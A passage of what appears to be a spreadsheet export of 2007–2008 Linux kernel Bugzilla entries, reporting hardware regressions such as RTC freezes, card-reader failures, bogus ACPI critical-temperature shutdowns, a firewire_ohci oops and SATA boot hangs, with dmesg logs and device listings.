subsystem@ uevent /sys/devices/platform/i8042/power: wakeup /sys/devices/platform/i8042/serio0: bind_mode driver@ err_count id/ power/ set softrepeat uevent description drvctl extra modalias scroll softraw subsystem@ /sys/devices/platform/i8042/serio0/id: extra id proto type /sys/devices/platform/i8042/serio0/power: wakeup /sys/devices/platform/i8042/serio1: bind_mode driver@ id/ power/ rate resolution subsystem@ description drvctl modalias protocol resetafter resync_time uevent /sys/devices/platform/i8042/serio1/id: extra id proto type /sys/devices/platform/i8042/serio1/power: wakeup cat /sys/devices/platform/i8042/*/description: ---------------------------------------------- i8042 KBD port i8042 AUX port</t>
  </si>
  <si>
    <t>legacy rtc makes computer freeze</t>
  </si>
  <si>
    <t>2007-08-09 09:20 UTC</t>
  </si>
  <si>
    <t>Marcus</t>
  </si>
  <si>
    <t>2008-02-24 23:10 UTC</t>
  </si>
  <si>
    <t>platform_x86_64@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.22 Distribution: Ubuntu 64bit 7.4 or Gentoo Hardware Environment: HP Pavilion dv9398eu, chipset: nvidia MCP51 proc: AMDTurion64x2, bios: F.38 Software Environment: Ubuntu 7.0 Problem Description: Computer freezes almost every time I (or boot scripts) run hwclock. Problem disappears with i386-kernel or if noapic or acpi=off kernel option is used. hwclock works if almost no modules are loaded. noapic or acpi=off introduces other problems, such as usb not working. If rtc is disabled in kernel then hwclock doesn't freeze computer, but no time is reported. Steps to reproduce: run hwclock</t>
  </si>
  <si>
    <t>Card Reader does not detect mmc cards</t>
  </si>
  <si>
    <t>2.6.22.1-16-default</t>
  </si>
  <si>
    <t>2007-08-09 11:13 UTC</t>
  </si>
  <si>
    <t>Adolfo Rodrigues</t>
  </si>
  <si>
    <t>2008-03-01 05:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Opensuse 10.3 Beta 1 Hardware Environment: Laptop Asus G1S "08:01.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 05) 08:01.1 Generic system peripheral [Class 0805]: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 22) 08:01.2 System peripheral: Ricoh Co Ltd Unknown device 0843 (rev 12) 08:01.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 12) 08:01.4 System peripheral: Ricoh Co Ltd xD-Picture Card Controller (rev 12)" It reads sd cards but not mmc or it does not support 4gb mmc cards</t>
  </si>
  <si>
    <t>Legacy mode ATA controllers fixed resources error</t>
  </si>
  <si>
    <t>2007-08-09 21:30 UTC</t>
  </si>
  <si>
    <t>Yoichi Yuasa</t>
  </si>
  <si>
    <t>2007-10-21 19:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: git commit 368c73d4f689dae0807d0a2aa74c61fd2b9b075f Distribution: Hardware Environment: MIPS Cobalt server with pata_via.c and via82cxxx.c Software Environment: Problem Description: The following errors occur when the machine boots up. PCI: Unable to reserve I/O region #1:8@f00001f0 for device 0000:00:09.1 pata_via 0000:00:09.1: failed to request/iomap BARs for port 0 (errno=-16) PCI: Unable to reserve I/O region #3:8@f0000170 for device 0000:00:09.1 pata_via 0000:00:09.1: failed to request/iomap BARs for port 1 (errno=-16) pata_via 0000:00:09.1: no available native port This problem occurs by the following steps. pci_setup_device() Legacy mode ATA controllers have fixed addresses. IDE resources: 0x1F0-0x1F7, 0x3F6, 0x170-0x177, 0x376 | V pcibios_fixup_bus() MIPS Cobalt PCI bus regions have the -0x10000000 offset from PCI resources. pcibios_fixup_bus() fix PCI bus regions. 0x1F0 - 0x10000000 = 0xF00001F0 | V ata_pci_init_one() PCI: Unable to reserve I/O region #1:8@f00001f0 for device 0000:00:09.1 Steps to reproduce: boot up MIPS Cobalt server.</t>
  </si>
  <si>
    <t>Nick</t>
  </si>
  <si>
    <t>Hardware shutoff at 83C - HP OmniBook XE3 GD</t>
  </si>
  <si>
    <t>2007-08-13 05:38 UTC</t>
  </si>
  <si>
    <t>2007-08-25 21:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21 Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>Unable to access memory card reader anymore</t>
  </si>
  <si>
    <t>2.6.23-rc3</t>
  </si>
  <si>
    <t>2007-08-13 09:14 UTC</t>
  </si>
  <si>
    <t>2007-09-11 11:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.1, maybe 2.6.23-rc2 Distribution: Slackware 12.0 Hardware Environment: Athlon64 3000, laptop Aspire 1511LMi, nForce3 150 Software Environment: Kernel 2.6.23-rc3, blockdev, udev, KDE 3.5.7 Problem Description: With kernel 2.6.22.1, when I plug a memory card in the integrated card reader of my laptop, the card is detected and KDE(via udev) asks me for mounting the device. With kernel 2.6.23-rc3, this does not happens anymore: - first, at boot, there are some new lines in dmesg saying /dev/sda is seen but size cannot be get (normal: there is no memory card in the reader); - second, plugging the card does nothing; - third, issuing "blockdev --rereadpt /dev/sda" does not work; - finally, fdisk /dev/sda fails (unable to open /dev/sda). So the device seems to be completly unusable now (this is a Thomson card reader if I remember well). dmesg output for 2.6.22.1-cfs19 and 2.6.23-rc3 appended to show the differences. Steps to reproduce: Maybe the problem is specific to my hardware. I presume: boot with an empty card reader connected, the plug the card and see it is inaccessible?</t>
  </si>
  <si>
    <t>No battery info with 2.6.23-rc3 kernels</t>
  </si>
  <si>
    <t>2007-08-13 09:21 UTC</t>
  </si>
  <si>
    <t>2008-10-17 21:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.x Distribution: Slackware 12 Hardware Environment: Athlon64 3000 + nForce3 150 on Aspire 1511 LMi Software Environment: none Problem Description: With recent kernels (2.6.23-rc3, maybe 2.6.23-rc2 but I'm not sure), the battery information is not available anymore on some laptops. Dmesg info for different kernel versions appended. Steps to reproduce: Maybe specific to my hardware. It used to have a DSDT replacement for old kernels (2.6.16 for instance), but since 2.6.19 up to 2.6.22 it was not necessary. Now, it does work with neither original nor fixed DSDT.</t>
  </si>
  <si>
    <t>WDC WD3200JD-00KLB0 fails HPA</t>
  </si>
  <si>
    <t>2007-08-14 09:48 UTC</t>
  </si>
  <si>
    <t>2008-09-23 03:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15-1.1833_FC4 Distribution: Fedora Core 4 Hardware Environment: Matsonic 8177c mobo via chipset 8237 south bridge. 2 sata devices. Software Environment: Problem Description: sata drive fails to set xfer mode Steps to reproduce:</t>
  </si>
  <si>
    <t>USB hard disk broken in 2.6.23-rc3</t>
  </si>
  <si>
    <t>2007-08-15 15:12 UTC</t>
  </si>
  <si>
    <t>2007-09-11 11:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.1 Distribution: Gentoo x86 Hardware Environment: 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:01.0 PCI bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express PCI Express Root Port (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation G72M [Quadro NVS 110M/GeForce Go 7300] (rev a1) 02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 01) 03:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02) 04:01.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b3) 04:01.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 08) 04:01.2 Generic system peripheral [0805]: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 17) 04:01.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 08) Software Environment: gcc 4.2.0 Problem Description: I was watching moovie from my usb harddisk and after approximately one hour the moovie stoped and I couldn't read anything from usb disk. I've reproduced this bug 4 times with (2.6.23-rc2 and 2.6.23-rc3) and I also tried patch from http://lkml.org/lkml/2007/8/10/195 but it did not help. The USB harddisk works in 2.6.22.1. I will attached dmesg log with usb debug enabled.</t>
  </si>
  <si>
    <t>Critical temperature reached (5487 C) if CONFIG_HWMON=y</t>
  </si>
  <si>
    <t>2007-08-16 06:27 UTC</t>
  </si>
  <si>
    <t>Encolpe Degoute</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: Debian unstable Hardware Environment: DELL Inspiron 9400 Software Environment: Debian lenny/KDE 3.5 Problem Description: I didn't have this bug before 2.6.19 on my debian kernel but since I can have this critical trop point three times a day like only one time a week. I didn't think it's only a conversion bug (see below). My dual core is reported in logs to be between 40 C and 55 C usually, and never reaches 60 C under load. The best score is 5745 C for 57 C # grep -A 4 "Critical trip point" syslog.? syslog.2:Jul 5 00:33:06 gosseyn kernel: ACPI: Critical trip point syslog.2-Jul 5 00:33:06 gosseyn kernel: Critical temperature reached (1135 C), shutting down. syslog.2-Jul 5 00:33:06 gosseyn shutdown[13784]: shutting down for system halt syslog.2-Jul 5 00:33:06 gosseyn init: Switching to runlevel: 0 syslog.2-Jul 5 00:33:08 gosseyn kernel: Critical temperature reached (41 C), shutting down. -- syslog.3:Jul 4 00:49:49 gosseyn kernel: ACPI: Critical trip point syslog.3-Jul 4 00:49:49 gosseyn kernel: Critical temperature reached (5487 C), shutting down. syslog.3-Jul 4 00:49:49 gosseyn shutdown[10029]: shutting down for system halt syslog.3-Jul 4 00:49:49 gosseyn init: Switching to runlevel: 0 syslog.3-Jul 4 00:49:51 gosseyn kernel: Critical temperature reached (53 C), shutting down. -- syslog.5:Jul 1 21:49:23 gosseyn kernel: ACPI: Critical trip point syslog.5-Jul 1 21:49:23 gosseyn kernel: Critical temperature reached (1135 C), shutting down. syslog.5-Jul 1 21:49:23 gosseyn shutdown[8231]: shutting down for system halt syslog.5-Jul 1 21:49:23 gosseyn init: Switching to runlevel: 0 syslog.5-Jul 1 21:50:20 gosseyn syslog-ng[3338]: syslog-ng starting up; version='2.0.0' -- syslog.6:Jul 1 00:04:08 gosseyn kernel: ACPI: Critical trip point syslog.6-Jul 1 00:04:08 gosseyn kernel: Critical temperature reached (1135 C), shutting down. syslog.6-Jul 1 00:04:08 gosseyn shutdown[12701]: shutting down for system halt syslog.6-Jul 1 00:04:08 gosseyn init: Switching to runlevel: 0 syslog.6-Jul 1 00:04:10 gosseyn kernel: Critical temperature reached (41 C), shutting down. Steps to reproduce: Random. This bug can come when nothing is done or under heavy load, when working console only or with 3D application.</t>
  </si>
  <si>
    <t>Documentation URLs for HPET are broken</t>
  </si>
  <si>
    <t>2.6.22.3</t>
  </si>
  <si>
    <t>2007-08-17 04:36 UTC</t>
  </si>
  <si>
    <t>Sebastien Koechlin</t>
  </si>
  <si>
    <t>2007-10-23 12:52 UTC</t>
  </si>
  <si>
    <t>In include/asm-i386/hpet.h: 31 /* 32 * Documentation on HPET can be found at: 33 * http://www.intel.com/ial/home/sp/pcmmspec.htm 34 * ftp://download.intel.com/ial/home/sp/mmts098.pdf 35 */ on line 33 and 34 URLs are broken. New valid URLs are probably: http://www.intel.com/technology/architecture/hpetspec.htm and http://www.intel.com/hardwaredesign/hpetspec_1.pdf</t>
  </si>
  <si>
    <t>2.6.23.1</t>
  </si>
  <si>
    <t>hard drive freezes, which freezes most everything on the computer, intermittently, then recovers, then happens again</t>
  </si>
  <si>
    <t>linux-2.6.22-9</t>
  </si>
  <si>
    <t>2007-08-18 16:51 UTC</t>
  </si>
  <si>
    <t>Joe Reid</t>
  </si>
  <si>
    <t>2008-02-15 23:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: all Distribution:ubuntu feisty and gutsy Hardware Environment:acer aspire 5600 laptop Software Environment:linux ubuntu Problem Description: the hard drive freezes for 3-5 minutes. usually the computer freezes too. then unfreezes, writes to disk, then does again at different times later. been going on a while. Steps to reproduce: i think it may be only my hardware this is happening on. nothing triggers it that i know of. i've done heave disk i/o and heavy processor loads before and they seem just as random. most noticeable watching video. if this is being reported in the wrong component, please help me get it to the right person. i very much want to see this bug fixed. please ask me if you need any additional info. my email is joereid@gmail.com here is dmesg: [20432.080000] ata1.01: qc timeout (cmd 0xa0) [20432.080000] ata1.01: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen [20432.080000] ata1.01: cmd a0/00:00:00:00:20/00:00:00:00:00/b0 tag 0 cdb 0x43 data 12 in [20432.080000] res 51/20:03:00:00:00/00:00:00:00:00/b0 Emask 0x5 (timeout) [20437.124000] ata1: port is slow to respond, please be patient (Status 0xd0) [20442.108000] ata1: device not ready (errno=-16), forcing hardreset [20442.108000] ata1: soft resetting port [20442.468000] ata1.00: configured for UDMA/33 [20442.660000] ata1.01: configured for UDMA/33 [20442.660000] ata1: EH complete [20442.676000] sd 0:0:0:0: [sda] 195371568 512-byte hardware sectors (100030 MB) [20442.696000] sd 0:0:0:0: [sda] Write Protect is off [20442.696000] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [20442.732000] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [20442.760000] sd 0:0:0:0: [sda] 195371568 512-byte hardware sectors (100030 MB) [20442.760000] sd 0:0:0:0: [sda] Write Protect is off [20442.760000] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [20442.796000] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA</t>
  </si>
  <si>
    <t>Search by kernel version doesn't work</t>
  </si>
  <si>
    <t>bugzilla</t>
  </si>
  <si>
    <t>2007-08-19 04:45 UTC</t>
  </si>
  <si>
    <t>2007-08-20 11:23 UTC</t>
  </si>
  <si>
    <t>The Kernel Version field doesn't appear to have any effect when searching for bugs. I've tried different modes but none worked, bugzilla always acts as if this field was empty.</t>
  </si>
  <si>
    <t>Some kind of Oops removing firewire_ohci module</t>
  </si>
  <si>
    <t>2.6.23-rc3-hrt2</t>
  </si>
  <si>
    <t>2007-08-19 08:23 UTC</t>
  </si>
  <si>
    <t>Bruce Duncan</t>
  </si>
  <si>
    <t>2008-03-11 05:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: Debian unstable Hardware Environment: ULI laptop Software Environment: latest -rc with hrtimers patch Problem Description: modprobe -r firewire_ohci gives some kind of oops which stops my keyboard working Steps to reproduce: simply remove the firewire_ohci module. I don't have any firewire devices to plug in. However, expecting it to oops again, I tried rmmod'ing firewire_ohci and then firewire_core (its only dependency). It didn't oops. I've made it oops about 3 times now. Once, my keyboard just kept repeating the 'enter' key. Each other time it just stops responding. Music keeps playing and I can still use the magic SysRq keys. The oops is: ======= CUT ======== ACPI: PCI interrupt for device 0000:00:10.2 disabled firewire_ohci: Removed fw-ohci device. PGD 203067 PUD 207063 PMD 36f1d067 PTE 0 CPU 0 Modules linked in: rc80211_simple snd_hda_intel i2c_ali1535 i2c_ali15x3 snd_pcm snd_page_alloc mac80211 ehci_hcd ohci_hcd Pid: 5, comm: events/0 Not tainted 2.6.23-rc3-hrt2 #2 RIP: 0010:[&lt;ffffffff8806a560&gt;] [&lt;ffffffff8806a560&gt;] RSP: 0018:ffff810037f93eb8 EFLAGS: 00010247 RAX: ffff810037fc7f80 RBX: ffff810037fc7f80 RCX: ffff8100367dd680 RDX: ffff810037fc7f80 RSI: ffff810037f93ee0 RDI: ffff8100367dd678 RBP: ffffffff8806a560 R08: ffff810037f92000 R09: 0000000000000001 R10: 000000000040c3a9 R11: 0000000000000246 R12: ffffffff8023cf00 R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000 FS: 00002af78a6d76e0(0000) GS:ffffffff80677000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: ffffffff8806a560 CR3: 0000000022092000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process events/0 (pid: 5, threadinfo ffff810037f92000, task ffff810037f90000) Stack: ffffffff8023c62f 0000000000000000 ffff810037fc7f90 ffff810037fc7f80 ffffffff8023cfc3 0000000000000000 ffff810037f90000 ffffffff80240250 ffff810037f93ef8 ffff810037f93ef8 0000000000000001 00000000fffffffc Call Trace: [&lt;ffffffff8023c62f&gt;] run_workqueue+0x6f/0xf0 [&lt;ffffffff8023cfc3&gt;] worker_thread+0xc3/0x130 [&lt;ffffffff80240250&gt;] autoremove_wake_function+0x0/0x30 [&lt;ffffffff8023cf00&gt;] worker_thread+0x0/0x130 [&lt;ffffffff8023fe2b&gt;] kthread+0x4b/0x80 [&lt;ffffffff8020c2a8&gt;] child_rip+0xa/0x12 [&lt;ffffffff8023fde0&gt;] kthread+0x0/0x80 [&lt;ffffffff8020c29e&gt;] child_rip+0x0/0x12 Code: Bad RIP value. RSP &lt;ffff810037f93eb8&gt; SysRq : Emergency Sync Emergency Sync complete SysRq : Emergency Remount R/O ======= CUT ====== Bruce</t>
  </si>
  <si>
    <t>hangs on boot</t>
  </si>
  <si>
    <t>2007-08-19 19:25 UTC</t>
  </si>
  <si>
    <t>Alex Hunsaker</t>
  </si>
  <si>
    <t>2008-10-17 21:31 UTC</t>
  </si>
  <si>
    <t>Hangs on boot with: ACPI: EC: GPE = 0x4, I/O: command/status = 0x66, data = 0x62 ACPI: Interpreter enabled ACPI: (supports S0 S3) ACPI: Using PIC for interrupt routing ACIP: EC: GPE = 0x4, I/O: command/status = 0x66, data = 0x62 2.6.23-rc2 is ok 2.6.23-rc3 bad 2.6.23-rc3-latest (7c010de7506954e973abfab5c5999c5a97f7a73e) bad git-bisect narrowed it down to: 7c010de7506954e973abfab5c5999c5a97f7a73e ACPI: EC: Switch from boot_ec as soon as we find its desc in DSDT. Alexey Starikovskiy [Fri, 3 Aug 2007 21:57:53 +0000 (17:57 -0400)] Some ASUS laptops fail to use boot time EC and need to eventually switch to one described in DSDT. http://bugzilla.kernel.org/show_bug.cgi?id=8709 Signed-off-by: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; Reverting the above commit fixes the problem.</t>
  </si>
  <si>
    <t>The USB 2.0 flash disk can not be detected with EHCI is loaded</t>
  </si>
  <si>
    <t>2.6.23-rc2-mm2</t>
  </si>
  <si>
    <t>2007-08-22 02:11 UTC</t>
  </si>
  <si>
    <t>henry su</t>
  </si>
  <si>
    <t>2007-09-25 02:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:N/A Distribution: FC7 Hardware Environment:ATI SB700 Software Environment: Problem Description: The plugged-in USB flash disk cannot be detected if EHCI module is loead,this disk works well in windows or the EHCI module is removed. Steps to reproduce: 1.boot Federa core 7, 2.plug in the USB 2.0 flash disk</t>
  </si>
  <si>
    <t>2.6.14 regression - Shutdown hangs after acpi_power_off called only if sounds outputed before.</t>
  </si>
  <si>
    <t>2.6.22.4</t>
  </si>
  <si>
    <t>2007-08-22 08:13 UTC</t>
  </si>
  <si>
    <t>Wei-li Tang</t>
  </si>
  <si>
    <t>2008-02-07 00:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.5 Distribution: Debian etch Hardware Environment: CPU: P4 3.0GHz MB: Gigabyte GA-8I915P Pro (Rev 1.x) North: i915P, South: ICH6. VGA: Leadtek WinFast PX6600 TD PCI-E (NVIDIA GeForce 6600) NIC: Broadcom 5751 SND: C-Media 9880 CODEC (UAJ) (driver: snd_hda_intel) Software Environment: Xorg 7.1.0, GNOME 2.14.3.6 Problem Description: Shutdown hangs after acpi_power_off called only if sounds outputed before. No matter whether X/GNOME runs or not, if no sounds output from my speaker until shutdown, things will be fine. The problem is similar to bug 6431 but I have no sky2 drive installed. Steps to reproduce: 1. cat something.wav &gt; /dev/dsp 2. shutdown -h now 3. acpi_power_off called (power isn't off.)</t>
  </si>
  <si>
    <t>When booting the kernel without a second HDD attached to SATA port, boot hangs</t>
  </si>
  <si>
    <t>2007-08-22 09:31 UTC</t>
  </si>
  <si>
    <t>2008-04-23 12:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: -/- Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: Intel Corporation 975X Express Memory Controller Hub (rev c0) 00:01.0 PCI bridge: Intel Corporation 975X Express PCI Express Root Port (rev c0) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 01) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 01) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev e1) 00:1f.0 ISA bridge: Intel Corporation 82801GB/GR (ICH7 Family) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 01) 00:1f.2 SATA controller: Intel Corporation 82801GR/GH (ICH7 Family) Serial ATA Storage Controller AHCI (rev 01) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 01) 01:00.0 Multimedia audio controller: Creative Labs Unknown device 0005 01:01.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 01:01.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 01:02.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 01:03.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 20) 04:00.0 VGA compatible controller: nVidia Corporation G70 [GeForce 7600 GT] (rev a1) H/W path Device Class Description =============================================================== system P5W DH Deluxe /0 bus P5W DH Deluxe /0/0 memory 64KB BIOS /0/4 processor Intel(R) Core(TM)2 CPU 6600 @ 2.4 /0/4/5 memory 32KB L1 cache /0/4/6 memory 4MB L2 cache /0/4/7 memory L3 cache /0/3c memory 2GB System Memory /0/3c/0 memory 1GB DIMM SDRAM Synchronous /0/3c/1 memory DIMM [empty] /0/3c/2 memory 1GB DIMM SDRAM Synchronous /0/3c/3 memory DIMM [empty] /0/100 bridge 975X Express Memory Controller Hub /0/100/1 bridge 975X Express PCI Express Root Port /0/100/1/0 display G70 [GeForce 7600 GT] /0/100/1b multimedia 82801G (ICH7 Family) High Definition Audio /0/100/1c bridge 82801G (ICH7 Family) PCI Express Port 1 /0/100/1c.3 bridge 82801G (ICH7 Family) PCI Express Port 4 /0/100/1c.3/0 eth0 network 88E8053 PCI-E Gigabit Ethernet Controller /0/100/1d bus 82801G (ICH7 Family) USB UHCI #1 /0/100/1d/1 usb2 bus UHCI Host Controller /0/100/1d/1/2 generic USB RECEIVER /0/100/1d.1 bus 82801G (ICH7 Family) USB UHCI #2 /0/100/1d.1/1 usb3 bus UHCI Host Controller /0/100/1d.1/1/1 generic ASUS DH Remote /0/100/1d.1/1/2 bus Logitech BT Mini-Receiver /0/100/1d.1/1/2/2 generic Logitech BT Mini-Receiver /0/100/1d.1/1/2/3 generic Logitech BT Mini-Receiver /0/100/1d.2 bus 82801G (ICH7 Family) USB UHCI #3 /0/100/1d.2/1 usb4 bus UHCI Host Controller /0/100/1d.2/1/1 generic Bluetooth Device /0/100/1d.3 bus 82801G (ICH7 Family) USB UHCI #4 /0/100/1d.3/1 usb5 bus UHCI Host Controller /0/100/1d.7 bus 82801G (ICH7 Family) USB2 EHCI Controller /0/100/1d.7/1 usb1 bus EHCI Host Controller /0/100/1d.7/1/1 bus USB2.0 Hub /0/100/1d.7/1/1/1 generic USB Receiver /0/100/1d.7/1/1/2 generic iP5200 /0/100/1d.7/1/1/3 generic Astra 2200/2200SU /0/100/1d.7/1/7 bus USB2.0 Hub /0/100/1d.7/1/7/1 bus USB2.0 Hub /0/100/1d.7/1/7/2 scsi6 generic USB Storage /0/100/1d.7/1/7/2/0.0.0 /dev/sdd disk STORAGE DEVICE /0/100/1d.7/1/7/2/0.0.0/0 /dev/sdd disk /0/100/1d.7/1/7/2/0.0.1 /dev/sde disk STORAGE DEVICE /0/100/1d.7/1/7/2/0.0.1/0 /dev/sde disk /0/100/1d.7/1/7/2/0.0.2 /dev/sdf disk STORAGE DEVICE /0/100/1d.7/1/7/2/0.0.2/0 /dev/sdf disk /0/100/1d.7/1/7/2/0.0.3 /dev/sdg disk STORAGE DEVICE /0/100/1d.7/1/7/2/0.0.3/0 /dev/sdg disk /0/100/1d.7/1/7/3 generic RTL8187_Wireless /0/100/1e bridge 82801 PCI Bridge /0/100/1e/0 multimedia SB X-Fi /0/100/1e/1 multimedia Bt878 Video Capture /0/100/1e/1.1 multimedia Bt878 Audio Capture /0/100/1e/2 wifi0 network AR5212 802.11abg NIC /0/100/1e/3 bus TSB43AB22/A IEEE-1394a-2000 Controller (PHY /0/100/1f bridge 82801GB/GR (ICH7 Family) LPC Interface Brid /0/100/1f.1 scsi4 storage 82801G (ICH7 Family) IDE Controller /0/100/1f.1/0.0.0 /dev/cdrom disk DVDR PX-760A /0/100/1f.1/0.1.0 /dev/cdrom1 disk DVD-ROM PX-130A /0/100/1f.2 scsi0 storage 82801GR/GH (ICH7 Family) Serial ATA Storage /0/100/1f.2/0 /dev/sda disk 69GB WDC WD740ADFD-00 /0/100/1f.2/0/1 /dev/sda1 volume 47MB Linux filesystem partition /0/100/1f.2/0/2 /dev/sda2 volume 956MB Linux swap / Solaris partition /0/100/1f.2/0/3 /dev/sda3 volume 68GB Linux filesystem partition /0/100/1f.2/1 /dev/sdh disk 149GB External Disk 0 /0/100/1f.2/1/1 /dev/sdh1 volume 149GB Linux filesystem partition /0/100/1f.2/0.0.0 /dev/sdc disk 69GB WDC WD740ADFD-00 /0/100/1f.2/0.0.0/1 /dev/sdc1 volume 69GB HPFS/NTFS partition /0/100/1f.3 bus 82801G (ICH7 Family) SMBus Controller /1 irlan0 network Ethernet interface Software Environment: Portage 2.1.2.12 (default-linux/amd64/2007.0/desktop, gcc-4.1.2, glibc-2.5-r4, 2.6.22.4 x86_64) ================================================================= System uname: 2.6.22.4 x86_64 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz Gentoo Base System release 1.12.9 Timestamp of tree: Wed, 22 Aug 2007 12:50:01 +0000 distcc 2.18.3 x86_64-pc-linux-gnu (protocols 1 and 2) (default port 3632) [disabled] ccache version 2.4 [enabled] dev-java/java-config: 1.3.7, 2.0.33-r1 dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r6 dev-util/ccache: 2.4-r7 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.17 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.24 virtual/os-headers: 2.6.21 ACCEPT_KEYWORDS="amd64" AUTOCLEAN="yes" CBUILD="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe -fomit-frame-pointer" CHOST="x86_64-pc-linux-gnu" Problem Description: I had this Problem a long time, but worked around it with an other HDD attached to the 3rd SATA port of the mainboard. (Asus P5W-DH Delux). Removing this device results in a long hang during boot: scsi0 : ahci scsi1 : ahci scsi2 : ahci scsi3 : ahci ata1: SATA max UDMA/133 cmd 0xffffc20001738900 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata2: SATA max UDMA/133 cmd 0xffffc20001738980 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata3: SATA max UDMA/133 cmd 0xffffc20001738a00 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata4: SATA max UDMA/133 cmd 0xffffc20001738a80 ctl 0x0000000000000000 bmdma 